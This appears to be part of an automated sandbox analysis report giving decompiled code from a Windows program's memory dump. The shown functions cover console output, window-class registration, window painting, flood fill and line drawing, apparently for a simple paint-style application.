                                              • Source File: 00000002.00000002.743554969.00000000002F1000.00000020.00020000.sdmp, Offset: 002F0000, based on PE: true
                                              • Associated: 00000002.00000002.743539901.00000000002F0000.00000002.00020000.sdmp
                                              • Associated: 00000002.00000002.743627285.00000000002FE000.00000002.00020000.sdmp
                                              • Associated: 00000002.00000002.743660121.0000000000304000.00000008.00020000.sdmp
                                              • Associated: 00000002.00000002.743687948.0000000000306000.00000002.00020000.sdmp
                                              • Associated: 00000002.00000002.744254245.0000000000315000.00000002.00020000.sdmp
                                              Similarity
                                              • API ID: Object$Select$BrushCreateDeleteFillFloodPixelReleaseSolid
                                              • String ID:
                                              • API String ID: 2019556567-0
                                              • Opcode ID: 208679d2345c7900cd0dec7b7493610eb2130dad6ae4fef99e56d4d1067b5ca0
                                              • Instruction ID: 9d87577a3609e387190e3697e5d7fd5c95a8d2ed99a56f85721d654b6051f932
                                              • Opcode Fuzzy Hash: 208679d2345c7900cd0dec7b7493610eb2130dad6ae4fef99e56d4d1067b5ca0
                                              • Instruction Fuzzy Hash: 65318279A10208EFCB08CFD4D9989AEB7B5FB88350F208599E905A7360C770AE41DF60
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 73%
                                              			E002F7AAA(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
                                              				signed int _v8;
                                              				signed char _v15;
                                              				char _v16;
                                              				void _v24;
                                              				short _v28;
                                              				char _v31;
                                              				void _v32;
                                              				long _v36;
                                              				intOrPtr _v40;
                                              				void* _v44;
                                              				signed int _v48;
                                              				signed char* _v52;
                                              				long _v56;
                                              				int _v60;
                                              				signed int _t78;
                                              				signed int _t80;
                                              				int _t86;
                                              				void* _t94;
                                              				long _t97;
                                              				void _t105;
                                              				void* _t112;
                                              				signed int _t116;
                                              				signed int _t118;
                                              				signed char _t123;
                                              				signed char _t128;
                                              				intOrPtr _t129;
                                              				signed int _t131;
                                              				signed char* _t133;
                                              				intOrPtr* _t135;
                                              				signed int _t136;
                                              				void* _t137;
                                              
                                              				_t78 =  *0x304018; // 0xbb40e64e
                                              				_v8 = _t78 ^ _t136;
                                              				_t80 = _a8;
                                              				_t118 = _t80 >> 6;
                                              				_t116 = (_t80 & 0x0000003f) * 0x30;
                                              				_t133 = _a12;
                                              				_v52 = _t133;
                                              				_v48 = _t118;
                                              				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0x3056f8 + _t118 * 4)) + _t116 + 0x18));
                                              				_v40 = _a16 + _t133;
                                              				_t86 = GetConsoleCP();
                                              				_t135 = _a4;
                                              				_v60 = _t86;
                                              				 *_t135 = 0;
                                              				 *((intOrPtr*)(_t135 + 4)) = 0;
                                              				 *((intOrPtr*)(_t135 + 8)) = 0;
                                              				while(_t133 < _v40) {
                                              					_v28 = 0;
                                              					_v31 =  *_t133;
                                              					_t129 =  *((intOrPtr*)(0x3056f8 + _v48 * 4));
                                              					_t123 =  *(_t129 + _t116 + 0x2d);
                                              					if((_t123 & 0x00000004) == 0) {
                                              						if(( *(E002F58B9(_t116, _t129) + ( *_t133 & 0x000000ff) * 2) & 0x00008000) == 0) {
                                              							_push(1);
                                              							_push(_t133);
                                              							goto L8;
                                              						} else {
                                              							if(_t133 >= _v40) {
                                              								_t131 = _v48;
                                              								 *((char*)( *((intOrPtr*)(0x3056f8 + _t131 * 4)) + _t116 + 0x2e)) =  *_t133;
                                              								 *( *((intOrPtr*)(0x3056f8 + _t131 * 4)) + _t116 + 0x2d) =  *( *((intOrPtr*)(0x3056f8 + _t131 * 4)) + _t116 + 0x2d) | 0x00000004;
                                              								 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
                                              							} else {
                                              								_t112 = E002F6B15( &_v28, _t133, 2);
                                              								_t137 = _t137 + 0xc;
                                              								if(_t112 != 0xffffffff) {
                                              									_t133 =  &(_t133[1]);
                                              									goto L9;
                                              								}
                                              							}
                                              						}
                                              					} else {
                                              						_t128 = _t123 & 0x000000fb;
                                              						_v16 =  *((intOrPtr*)(_t129 + _t116 + 0x2e));
                                              						_push(2);
                                              						_v15 = _t128;
                                              						 *(_t129 + _t116 + 0x2d) = _t128;
                                              						_push( &_v16);
                                              						L8:
                                              						_push( &_v28);
                                              						_t94 = E002F6B15();
                                              						_t137 = _t137 + 0xc;
                                              						if(_t94 != 0xffffffff) {
                                              							L9:
                                              							_t133 =  &(_t133[1]);
                                              							_t97 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
                                              							_v56 = _t97;
                                              							if(_t97 != 0) {
                                              								if(WriteFile(_v44,  &_v24, _t97,  &_v36, 0) == 0) {
                                              									L19:
                                              									 *_t135 = GetLastError();
                                              								} else {
                                              									 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 8)) - _v52 + _t133;
                                              									if(_v36 >= _v56) {
                                              										if(_v31 != 0xa) {
                                              											goto L16;
                                              										} else {
                                              											_t105 = 0xd;
                                              											_v32 = _t105;
                                              											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
                                              												goto L19;
                                              											} else {
                                              												if(_v36 >= 1) {
                                              													 *((intOrPtr*)(_t135 + 8)) =  *((intOrPtr*)(_t135 + 8)) + 1;
                                              													 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
                                              													goto L16;
                                              												}
                                              											}
                                              										}
                                              									}
                                              								}
                                              							}
                                              						}
                                              					}
                                              					goto L20;
                                              					L16:
                                              				}
                                              				L20:
                                              				return E002F19D1(_v8 ^ _t136);
                                              			}

                                              Instruction addresses (one per source line, in order):
                                              0x002f7ab2, 0x002f7ab9, 0x002f7abc, 0x002f7ac4, 0x002f7ac8, 0x002f7ad4, 0x002f7ad7, 0x002f7ada,
                                              0x002f7ae1, 0x002f7ae9, 0x002f7aec, 0x002f7af2, 0x002f7af8, 0x002f7afd, 0x002f7aff, 0x002f7b02,
                                              0x002f7b07, 0x002f7b11, 0x002f7b18, 0x002f7b1b, 0x002f7b22, 0x002f7b29, 0x002f7b55, 0x002f7b7b,
                                              0x002f7b7d, 0x00000000, 0x002f7b57, 0x002f7b5a, 0x002f7c21, 0x002f7c2d, 0x002f7c38, 0x002f7c3d,
                                              0x002f7b60, 0x002f7b67, 0x002f7b6c, 0x002f7b72, 0x002f7b78, 0x00000000, 0x002f7b78, 0x002f7b72,
                                              0x002f7b5a, 0x002f7b2b, 0x002f7b2f, 0x002f7b32, 0x002f7b38, 0x002f7b3a, 0x002f7b3d, 0x002f7b41,
                                              0x002f7b7e, 0x002f7b81, 0x002f7b82, 0x002f7b87, 0x002f7b8d, 0x002f7b93, 0x002f7ba2, 0x002f7ba8,
                                              0x002f7bae, 0x002f7bb3, 0x002f7bcf, 0x002f7c42, 0x002f7c48, 0x002f7bd1, 0x002f7bd9, 0x002f7be2,
                                              0x002f7be8, 0x00000000, 0x002f7bea, 0x002f7bec, 0x002f7bef, 0x002f7c08, 0x00000000, 0x002f7c0a,
                                              0x002f7c0e, 0x002f7c10, 0x002f7c13, 0x00000000, 0x002f7c13, 0x002f7c0e, 0x002f7c08, 0x002f7be8,
                                              0x002f7be2, 0x002f7bcf, 0x002f7bb3, 0x002f7b8d, 0x00000000, 0x002f7c16, 0x002f7c16, 0x002f7c4a,
                                              0x002f7c5c

                                              APIs
                                              • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,002F821F,?,00000000,?,00000000,00000000), ref: 002F7AEC
                                              • __fassign.LIBCMT ref: 002F7B67
                                              • __fassign.LIBCMT ref: 002F7B82
                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 002F7BA8
                                              • WriteFile.KERNEL32(?,?,00000000,002F821F,00000000,?,?,?,?,?,?,?,?,?,002F821F,?), ref: 002F7BC7
                                              • WriteFile.KERNEL32(?,?,00000001,002F821F,00000000,?,?,?,?,?,?,?,?,?,002F821F,?), ref: 002F7C00
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.743554969.00000000002F1000.00000020.00020000.sdmp, Offset: 002F0000, based on PE: true
                                              • Associated: 00000002.00000002.743539901.00000000002F0000.00000002.00020000.sdmp
                                              • Associated: 00000002.00000002.743627285.00000000002FE000.00000002.00020000.sdmp
                                              • Associated: 00000002.00000002.743660121.0000000000304000.00000008.00020000.sdmp
                                              • Associated: 00000002.00000002.743687948.0000000000306000.00000002.00020000.sdmp
                                              • Associated: 00000002.00000002.744254245.0000000000315000.00000002.00020000.sdmp
                                              Similarity
                                              • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                              • String ID:
                                              • API String ID: 1324828854-0
                                              • Opcode ID: 1467036a1137ba96bb8c4cbe082a4c5f6256bffaae9bb3e427a1e7ac5a1186b2
                                              • Instruction ID: 9889fc726157420b97cad4c1014da81693ccc0eaec0cab8c9ba46af1544bd160
                                              • Opcode Fuzzy Hash: 1467036a1137ba96bb8c4cbe082a4c5f6256bffaae9bb3e427a1e7ac5a1186b2
                                              • Instruction Fuzzy Hash: 1A51F3B091420D9FDB10CFA8D885AFEFBF8EF09340F14407AE651E7291E6709951CB60
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E002FCD70(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                              				int _v8;
                                              				struct HDC__* _v12;
                                              				struct tagRECT _v28;
                                              				struct tagPAINTSTRUCT _v92;
                                              				long _t36;
                                              
                                              				_v8 = _a8;
                                              				if(_v8 == 0xf) {
                                              					GetClientRect(_a4,  &_v28);
                                              					_v12 = BeginPaint(_a4,  &_v92);
                                              					_t36 =  *0x304a00; // 0xffffff
                                              					SetBkColor(_v12, _t36);
                                              					ExtTextOutW(_v12, 0, 0, 2,  &_v28, 0x305938, 0, 0);
                                              					EndPaint(_a4,  &_v92);
                                              				} else {
                                              					if(_v8 == 0x201) {
                                              						 *0x304a00 = E002FCA50(_a4);
                                              						InvalidateRect(_a4, 0, 1);
                                              					}
                                              				}
                                              				return DefWindowProcW(_a4, _a8, _a12, _a16);
                                              			}

                                              Instruction addresses (one per source line, in order): 0x002fcd79, 0x002fcd80, 0x002fcdb3, 0x002fcdc7, 0x002fcdca, 0x002fcdd5, 0x002fcdf2, 0x002fce00, 0x002fcd82, 0x002fcd89, 0x002fcd96, 0x002fcda3, 0x002fcda3, 0x002fcd89, 0x002fce1f

                                              APIs
                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 002FCDA3
                                              • GetClientRect.USER32 ref: 002FCDB3
                                              • BeginPaint.USER32(?,?), ref: 002FCDC1
                                              • SetBkColor.GDI32(?,00FFFFFF), ref: 002FCDD5
                                              • ExtTextOutW.GDI32(?,00000000,00000000,00000002,?,00305938,00000000,00000000), ref: 002FCDF2
                                              • EndPaint.USER32(?,?), ref: 002FCE00
                                              • DefWindowProcW.USER32(?,?,?,?), ref: 002FCE16
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.743554969.00000000002F1000.00000020.00020000.sdmp, Offset: 002F0000, based on PE: true
• Associated: 00000002.00000002.743539901.00000000002F0000.00000002.00020000.sdmp
• Associated: 00000002.00000002.743627285.00000000002FE000.00000002.00020000.sdmp
• Associated: 00000002.00000002.743660121.0000000000304000.00000008.00020000.sdmp
• Associated: 00000002.00000002.743687948.0000000000306000.00000002.00020000.sdmp
• Associated: 00000002.00000002.744254245.0000000000315000.00000002.00020000.sdmp
                                              Similarity
                                              • API ID: PaintRect$BeginClientColorInvalidateProcTextWindow
                                              • String ID:
                                              • API String ID: 418155164-0
                                              • Opcode ID: a6774af14a743247c02e119c0ffce8c76c9234e08a3b2cff9041a5a3e0e6f69f
                                              • Instruction ID: d817a1c520401e4848020557dd21a7e30cfadc2a703c4f349b5aed0617e41e0b
                                              • Opcode Fuzzy Hash: a6774af14a743247c02e119c0ffce8c76c9234e08a3b2cff9041a5a3e0e6f69f
                                              • Instruction Fuzzy Hash: 4021517565020CFBDB14CFA4EC49FEE7B79AB48750F108518FA099B290D7709A50CB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E002FC550(struct HINSTANCE__* _a8) {
                                              				struct _WNDCLASSEXW _v52;
                                              				void* _t19;
                                              
                                              				_v52.cbSize = 0;
                                              				E002F1D00(_t19,  &(_v52.style), 0, 0x2c);
                                              				_v52.cbSize = 0x30;
                                              				_v52.lpfnWndProc = E002FD620;
                                              				_v52.hInstance = _a8;
                                              				_v52.hbrBackground = GetSysColorBrush(0xf);
                                              				_v52.lpszClassName = L"CGBOXCLASS";
                                              				RegisterClassExW( &_v52);
                                              				return CreateWindowExW(9, L"CGBOXCLASS", 0x30498c, 0x10c80000, 0x64, 0x64, 0xc8, 0xc8, 0, 0, _a8, 0);
                                              			}

                                              APIs
                                              • GetSysColorBrush.USER32(0000000F), ref: 002FC583
                                              • RegisterClassExW.USER32 ref: 002FC597
                                              • CreateWindowExW.USER32 ref: 002FC5C6
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.743554969.00000000002F1000.00000020.00020000.sdmp, Offset: 002F0000, based on PE: true
• Associated: 00000002.00000002.743539901.00000000002F0000.00000002.00020000.sdmp
• Associated: 00000002.00000002.743627285.00000000002FE000.00000002.00020000.sdmp
• Associated: 00000002.00000002.743660121.0000000000304000.00000008.00020000.sdmp
• Associated: 00000002.00000002.743687948.0000000000306000.00000002.00020000.sdmp
• Associated: 00000002.00000002.744254245.0000000000315000.00000002.00020000.sdmp
                                              Similarity
                                              • API ID: BrushClassColorCreateRegisterWindow
                                              • String ID: 0$CGBOXCLASS$tI0
                                              • API String ID: 4191210197-606435202
                                              • Opcode ID: 1fdabf13456a7965bb9e5a2dbe71ea291939cc03a16fd2385a04af9bf94c8e6a
                                              • Instruction ID: f296cf72a13b8ee4a4f384898086c91cba9a8add45422f9261ccb58c9d8a0b08
                                              • Opcode Fuzzy Hash: 1fdabf13456a7965bb9e5a2dbe71ea291939cc03a16fd2385a04af9bf94c8e6a
                                              • Instruction Fuzzy Hash: 270181B4A90308BBFB109F90EC4AFAEBB78AB04B04F004124FB147A2C1D7F01614CB95
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E002FC5E0(struct HINSTANCE__* _a12) {
                                              				struct _WNDCLASSEXW _v52;
                                              				void* _t19;
                                              
                                              				_v52.cbSize = 0;
                                              				E002F1D00(_t19,  &(_v52.style), 0, 0x2c);
                                              				_v52.cbSize = 0x30;
                                              				_v52.lpfnWndProc = E002FD5A0;
                                              				_v52.hInstance = _a12;
                                              				_v52.hbrBackground = GetSysColorBrush(0xf);
                                              				_v52.lpszClassName = L"DialogClass";
                                              				RegisterClassExW( &_v52);
                                              				return CreateWindowExW(9, L"DialogClass", 0x30494c, 0x10c80000, 0x64, 0x64, 0xc8, 0x96, 0, 0, _a12, 0);
                                              			}

                                              APIs
                                              • GetSysColorBrush.USER32(0000000F), ref: 002FC613
                                              • RegisterClassExW.USER32 ref: 002FC627
                                              • CreateWindowExW.USER32 ref: 002FC656
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.743554969.00000000002F1000.00000020.00020000.sdmp, Offset: 002F0000, based on PE: true
• Associated: 00000002.00000002.743539901.00000000002F0000.00000002.00020000.sdmp
• Associated: 00000002.00000002.743627285.00000000002FE000.00000002.00020000.sdmp
• Associated: 00000002.00000002.743660121.0000000000304000.00000008.00020000.sdmp
• Associated: 00000002.00000002.743687948.0000000000306000.00000002.00020000.sdmp
• Associated: 00000002.00000002.744254245.0000000000315000.00000002.00020000.sdmp
                                              Similarity
                                              • API ID: BrushClassColorCreateRegisterWindow
                                              • String ID: 0$4I0$DialogClass
                                              • API String ID: 4191210197-2213612487
                                              • Opcode ID: 5a559c4c7d1434afbb70a9803734c39ec08d4add737a28d751fc292d776b6a1a
                                              • Instruction ID: d31833288f25d2d369a6ac2c36c5039dcea7e008dad5135fe880e130d6cc2686
                                              • Opcode Fuzzy Hash: 5a559c4c7d1434afbb70a9803734c39ec08d4add737a28d751fc292d776b6a1a
                                              • Instruction Fuzzy Hash: A50181B0A90308BBEB109F90EC5AFAFBB74AB04B44F500424FB147A2C1D7F15524CB95
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E002FB540(void* __eflags, struct HDC__* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36) {
                                              				intOrPtr _v8;
                                              				long _v12;
                                              				int _v16;
                                              				int _v20;
                                              				int _v24;
                                              				int _v28;
                                              				int _v32;
                                              				int _v36;
                                              				int _v40;
                                              				int _t219;
                                              				int _t225;
                                              				int _t231;
                                              				int _t237;
                                              				int _t243;
                                              
                                              				_v16 = E002FB8A0(_a12, _a4, _a8, _a12, _a20);
                                              				_v8 = E002FB840(_a4, _a4, _a8, _a12, _a20);
                                              				E002FBE50(_a4, _a4, _v16, _a12, _v8, _a12, _a16, _a36, 1, 0);
                                              				if(_a32 != 1) {
                                              					_v28 = _v16;
                                              					while(1) {
                                              						__eflags = _v28 - _v8;
                                              						if(_v28 > _v8) {
                                              							goto L20;
                                              						}
                                              						_v12 = GetPixel(_a4, _v28, _a12 - 1);
                                              						__eflags = _v12 - _a20;
                                              						if(_v12 == _a20) {
                                              							__eflags = _a12 - 1;
                                              							_v28 = E002FB540(_a12 - 1, _a4, _v28, _a12 - 1, _a16, _a20, _v16, _v8, 2, _a36);
                                              						}
                                              						_t237 = _v28 + 1;
                                              						__eflags = _t237;
                                              						_v28 = _t237;
                                              					}
                                              				} else {
                                              					_v20 = _v16;
                                              					while(_v20 < _a24) {
                                              						_v12 = GetPixel(_a4, _v20, _a12 - 1);
                                              						if(_v12 == _a20) {
                                              							_v20 = E002FB540(_a12 - 1, _a4, _v20, _a12 - 1, _a16, _a20, _v16, _v8, 2, _a36);
                                              						}
                                              						_v20 = _v20 + 1;
                                              					}
                                              					_v24 = _a28 + 1;
                                              					while(1) {
                                              						__eflags = _v24 - _v8;
                                              						if(_v24 > _v8) {
                                              							break;
                                              						}
                                              						_v12 = GetPixel(_a4, _v24, _a12 - 1);
                                              						__eflags = _v12 - _a20;
                                              						if(_v12 == _a20) {
                                              							__eflags = _a12 - 1;
                                              							_v24 = E002FB540(_a12 - 1, _a4, _v24, _a12 - 1, _a16, _a20, _v16, _v8, 2, _a36);
                                              						}
                                              						_t243 = _v24 + 1;
                                              						__eflags = _t243;
                                              						_v24 = _t243;
                                              					}
                                              				}
                                              				L20:
                                              				__eflags = _a32 - 2;
                                              				if(_a32 != 2) {
                                              					_v40 = _v16;
                                              					while(1) {
                                              						__eflags = _v40 - _v8;
                                              						if(_v40 > _v8) {
                                              							goto L40;
                                              						}
                                              						_v12 = GetPixel(_a4, _v40, _a12 + 1);
                                              						__eflags = _v12 - _a20;
                                              						if(_v12 == _a20) {
                                              							__eflags = _a12 + 1;
                                              							_v40 = E002FB540(_a12 + 1, _a4, _v40, _a12 + 1, _a16, _a20, _v16, _v8, 1, _a36);
                                              						}
                                              						_t219 = _v40 + 1;
                                              						__eflags = _t219;
                                              						_v40 = _t219;
                                              					}
                                              				} else {
                                              					_v32 = _v16;
                                              					while(1) {
                                              						__eflags = _v32 - _a24;
                                              						if(_v32 >= _a24) {
                                              							break;
                                              						}
                                              						_v12 = GetPixel(_a4, _v32, _a12 + 1);
                                              						__eflags = _v12 - _a20;
                                              						if(_v12 == _a20) {
                                              							__eflags = _a12 + 1;
                                              							_v32 = E002FB540(_a12 + 1, _a4, _v32, _a12 + 1, _a16, _a20, _v16, _v8, 1, _a36);
                                              						}
                                              						_t231 = _v32 + 1;
                                              						__eflags = _t231;
                                              						_v32 = _t231;
                                              					}
                                              					_v36 = _a28 + 1;
                                              					while(1) {
                                              						__eflags = _v36 - _v8;
                                              						if(_v36 > _v8) {
                                              							break;
                                              						}
                                              						_v12 = GetPixel(_a4, _v36, _a12 + 1);
                                              						__eflags = _v12 - _a20;
                                              						if(_v12 == _a20) {
                                              							__eflags = _a12 + 1;
                                              							_v36 = E002FB540(_a12 + 1, _a4, _v36, _a12 + 1, _a16, _a20, _v16, _v8, 1, _a36);
                                              						}
                                              						_t225 = _v36 + 1;
                                              						__eflags = _t225;
                                              						_v36 = _t225;
                                              					}
                                              				}
                                              				L40:
                                              				return _v8;
                                              			}

                                              APIs
                                                • Part of subcall function 002FB8A0: GetPixel.GDI32(?,?,?), ref: 002FB8B0
                                                • Part of subcall function 002FB8A0: GetPixel.GDI32(?,00000000,?), ref: 002FB8DC
                                                • Part of subcall function 002FB840: GetPixel.GDI32(?,?,?), ref: 002FB850
                                                • Part of subcall function 002FB840: GetPixel.GDI32(?,00000000,?), ref: 002FB87C
                                                • Part of subcall function 002FBE50: GetPixel.GDI32(?,?,?), ref: 002FBF17
                                                • Part of subcall function 002FBE50: SetPixel.GDI32(?,?,?,?), ref: 002FBF70
                                              • GetPixel.GDI32(?,?,?), ref: 002FB5CD
                                              • GetPixel.GDI32(?,?,?), ref: 002FB638
                                              • GetPixel.GDI32(?,?,?), ref: 002FB6A2
                                              • GetPixel.GDI32(?,?,?), ref: 002FB714
                                              • GetPixel.GDI32(?,?,?), ref: 002FB77F
                                              • GetPixel.GDI32(?,00000002,?), ref: 002FB7E9
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.743554969.00000000002F1000.00000020.00020000.sdmp, Offset: 002F0000, based on PE: true
• Associated: 00000002.00000002.743539901.00000000002F0000.00000002.00020000.sdmp
• Associated: 00000002.00000002.743627285.00000000002FE000.00000002.00020000.sdmp
• Associated: 00000002.00000002.743660121.0000000000304000.00000008.00020000.sdmp
• Associated: 00000002.00000002.743687948.0000000000306000.00000002.00020000.sdmp
• Associated: 00000002.00000002.744254245.0000000000315000.00000002.00020000.sdmp
                                              Similarity
                                              • API ID: Pixel
                                              • String ID:
                                              • API String ID: 3195210534-0
                                              • Opcode ID: 2dc2cb511149c18bf997bf798e3da9303b98d1534867cc9ef9053b7d7ff87a04
                                              • Instruction ID: 84eee227279c03e216b0146c3de50c88661ca7c9e1f35c8677ee7137d04025a6
                                              • Opcode Fuzzy Hash: 2dc2cb511149c18bf997bf798e3da9303b98d1534867cc9ef9053b7d7ff87a04
                                              • Instruction Fuzzy Hash: 16C182B5A1410DAFCF05CF98D991DEFB7BABB88380F208558F619E7244D730A951CBA4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 91%
                                              			E002FBE50(signed int __edx, struct HDC__* _a4, void* _a8, void* _a12, signed int _a16, signed int _a20, long _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36) {
                                              				intOrPtr _v8;
                                              				int _v12;
                                              				int _v16;
                                              				int _v20;
                                              				int _v24;
                                              				signed int _v28;
                                              				signed int _v32;
                                              				intOrPtr _v36;
                                              				intOrPtr _v40;
                                              				intOrPtr _v44;
                                              				int _t144;
                                              				int _t166;
                                              				signed int _t220;
                                              				signed int _t237;
                                              
                                              				asm("cdq");
                                              				asm("cdq");
                                              				if((_a16 - _a8 ^ __edx) - __edx >= (_a20 - _a12 ^ __edx) - __edx) {
                                              					if(_a8 > _a16) {
                                              						E002FC490( &_a8,  &_a8,  &_a16);
                                              						E002FC490( &_a8,  &_a12,  &_a20);
                                              					}
                                              					_v20 = _a12;
                                              					_t237 = _a20;
                                              					if(_t237 <= _a12) {
                                              						_v40 = 0xffffffff;
                                              					} else {
                                              						_v40 = 1;
                                              					}
                                              					_v36 = _v40;
                                              					_v32 = _a16 - _a8;
                                              					asm("cdq");
                                              					_v28 = (_a20 - _a12 ^ _t237) - _t237;
                                              					_v8 = (_v28 << 1) - _v32;
                                              					_t166 = _a8;
                                              					_v12 = _t166;
                                              					while(_v12 <= _a16) {
                                              						if(_a32 != 0) {
                                              							if(_a36 != 0) {
                                              								E002FC390(_v12, _a28, _v12, _v20, 0xffffff - GetPixel(_a4, _v12, _v20), _a24);
                                              							} else {
                                              								E002FC390(_v20, _a28, _v12, _v20, GetPixel(_a4, _v12, _v20), _a24);
                                              							}
                                              						}
                                              						SetPixel(_a4, _v12, _v20, _a24);
                                              						if(_v8 <= 0) {
                                              							_t166 = _v8;
                                              							_v8 = _t166 + _v28 * 2;
                                              						} else {
                                              							_v20 = _v20 + _v36;
                                              							_t166 = _v8;
                                              							_v8 = _t166 + (_v28 - _v32) * 2;
                                              						}
                                              						_v12 = _v12 + 1;
                                              					}
                                              					return _t166;
                                              				}
                                              				if(_a12 > _a20) {
                                              					E002FC490( &_a8,  &_a8,  &_a16);
                                              					E002FC490( &_a8,  &_a12,  &_a20);
                                              				}
                                              				_v24 = _a8;
                                              				_t220 = _a16;
                                              				if(_t220 <= _a8) {
                                              					_v44 = 0xffffffff;
                                              				} else {
                                              					_v44 = 1;
                                              				}
                                              				_v36 = _v44;
                                              				asm("cdq");
                                              				_v32 = (_a16 - _a8 ^ _t220) - _t220;
                                              				_v28 = _a20 - _a12;
                                              				_v8 = (_v32 << 1) - _v28;
                                              				_t144 = _a12;
                                              				_v16 = _t144;
                                              				while(_v16 <= _a20) {
                                              					if(_a32 != 0) {
                                              						if(_a36 != 0) {
                                              							E002FC390(_v24, _a28, _v24, _v16, 0xffffff - GetPixel(_a4, _v24, _v16), _a24);
                                              						} else {
                                              							E002FC390(_v16, _a28, _v24, _v16, GetPixel(_a4, _v24, _v16), _a24);
                                              						}
                                              					}
                                              					SetPixel(_a4, _v24, _v16, _a24);
                                              					if(_v8 <= 0) {
                                              						_t144 = _v8;
                                              						_v8 = _t144 + _v32 * 2;
                                              					} else {
                                              						_v24 = _v24 + _v36;
                                              						_t144 = _v8;
                                              						_v8 = _t144 + (_v32 - _v28) * 2;
                                              					}
                                              					_v16 = _v16 + 1;
                                              				}
                                              				return _t144;
                                              			}
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.743554969.00000000002F1000.00000020.00020000.sdmp, Offset: 002F0000, based on PE: true
                                              • Associated: 00000002.00000002.743539901.00000000002F0000.00000002.00020000.sdmp
                                              • Associated: 00000002.00000002.743627285.00000000002FE000.00000002.00020000.sdmp
                                              • Associated: 00000002.00000002.743660121.0000000000304000.00000008.00020000.sdmp
                                              • Associated: 00000002.00000002.743687948.0000000000306000.00000002.00020000.sdmp
                                              • Associated: 00000002.00000002.744254245.0000000000315000.00000002.00020000.sdmp
                                              Similarity
                                              • API ID: Pixel
                                              • String ID:
                                              • API String ID: 3195210534-0
                                              • Opcode ID: 6b6753c74ed91656936779d769e3e57e52ab650e99f8c92b68de4e2b899f9a12
                                              • Instruction ID: 6a785ede1eba339b2014bad133933df3fb7f348c7f212a7d292d23856202fccb
                                              • Opcode Fuzzy Hash: 6b6753c74ed91656936779d769e3e57e52ab650e99f8c92b68de4e2b899f9a12
                                              • Instruction Fuzzy Hash: 03A1B775A1010EEFCF04CFA8C9949EEB7B6BF48340F208659FA15A7254D734AA51CF60
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E002FD5A0(void* __ecx, struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                              				int _v8;
                                              
                                              				_v8 = _a8;
                                              				if(_v8 == 1) {
                                              					CreateWindowExW(0, L"button", 0x304a38, 0x50000000, 0x32, 0x32, 0x50, 0x19, _a4, 1, 0, 0);
                                              				} else {
                                              					if(_v8 == 0x10) {
                                              						DestroyWindow(_a4);
                                              					} else {
                                              						if(_v8 == 0x111) {
                                              							DestroyWindow(_a4);
                                              						}
                                              					}
                                              				}
                                              				return DefWindowProcW(_a4, _a8, _a12, _a16);
                                              			}
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.743554969.00000000002F1000.00000020.00020000.sdmp, Offset: 002F0000, based on PE: true
                                              • Associated: 00000002.00000002.743539901.00000000002F0000.00000002.00020000.sdmp
                                              • Associated: 00000002.00000002.743627285.00000000002FE000.00000002.00020000.sdmp
                                              • Associated: 00000002.00000002.743660121.0000000000304000.00000008.00020000.sdmp
                                              • Associated: 00000002.00000002.743687948.0000000000306000.00000002.00020000.sdmp
                                              • Associated: 00000002.00000002.744254245.0000000000315000.00000002.00020000.sdmp
                                              Similarity
                                              • API ID: Window$Destroy$CreateProc
                                              • String ID: button
                                              • API String ID: 3790344893-973515837
                                              • Opcode ID: 63ed79ee088aecf3b6efbbc68fe3f5ffb85948c6cba8564295eb1f24e7b244d7
                                              • Instruction ID: d42274ceb8a78e03b9c3b28fdde1f1b11fd51a4b9bca436c82d9702403315367
                                              • Opcode Fuzzy Hash: 63ed79ee088aecf3b6efbbc68fe3f5ffb85948c6cba8564295eb1f24e7b244d7
                                              • Instruction Fuzzy Hash: 7F0140B529020CFBDB14CF54DC5EFAAB769AB08785F508118FB099B2D0C6B09E10DB54
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E002FC4C0(struct HINSTANCE__* _a8) {
                                              				struct _WNDCLASSEXW _v52;
                                              				void* _t19;
                                              
                                              				_v52.cbSize = 0;
                                              				E002F1D00(_t19,  &(_v52.style), 0, 0x2c);
                                              				_v52.cbSize = 0x30;
                                              				_v52.lpfnWndProc = E002FD400;
                                              				_v52.hInstance = _a8;
                                              				_v52.hbrBackground = GetSysColorBrush(0xf);
                                              				_v52.lpszClassName = L"SAVEBOXCLASS";
                                              				RegisterClassExW( &_v52);
                                              				return CreateWindowExW(9, L"SAVEBOXCLASS", 0x3049d8, 0x10c80000, 0x64, 0x64, 0xc8, 0xc8, 0, 0, _a8, 0);
                                              			}
